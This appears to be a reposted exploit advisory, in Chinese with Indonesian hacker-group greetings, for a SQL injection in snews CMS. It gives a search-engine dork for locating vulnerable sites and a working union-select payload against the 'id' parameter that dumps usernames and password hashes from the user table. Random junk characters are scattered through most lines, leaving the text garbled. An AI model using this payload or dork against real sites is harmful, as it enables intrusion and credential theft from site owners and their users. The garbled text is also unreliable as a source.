标题: CMS snews SQL Injection Vulnerability2 G2 T" z8 E8 B; d( y* G
作者: By onestree$ J e- q) l V9 {* T' Q
下载地址 : http://snewscms.com/
2 |8 J; c+ z" h6 r! A$ m4 N! o测试平台 : ubuntu 12.10 / win 7
* d' J V0 T7 v& b关键词: inurl:"tanyakan pada rumput yang bergoyang"6 v7 _8 J- y3 l
" h( U6 g* c0 ^! { $ j5 t5 O/ `" B# u% A4 i
*************************************************************
9 T$ n; X C6 \, ~
; a# f* q: I$ M% y6 PSQL poc:9 L5 s! U1 e: I& h- G
0 T; B, q7 _. a( {* }! ~
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
* ?* u! Q' X% ^8 a8 e. |+ Q
; ^& ?9 q8 K- u: X+ r) |示例
7 G6 r7 i- n+ G- z# w, q" { 4 f) N) o8 T' i6 u$ B! o
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*% j9 Z/ u* `3 l7 d2 h- Y1 `% y3 s: S
$ g0 X( c3 F4 o) L: x4 E
9 q! O9 S9 `6 i. s8 u致谢:, f8 K* y2 b, A( s
4 w- q/ a; E1 ?/ `/ d
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell: w" B3 K g3 j+ E) ~
% V% A8 d' o. `0 t& W# ^9 x, ? indonesiancoder - moeslimh4x0r - go-coder8 @5 p, x7 O# ], A4 l& F: d
. D3 Q$ s) N9 U+ o$ rspesial my hunny :*1 |5 U. b7 W( _ O3 j5 }: v
|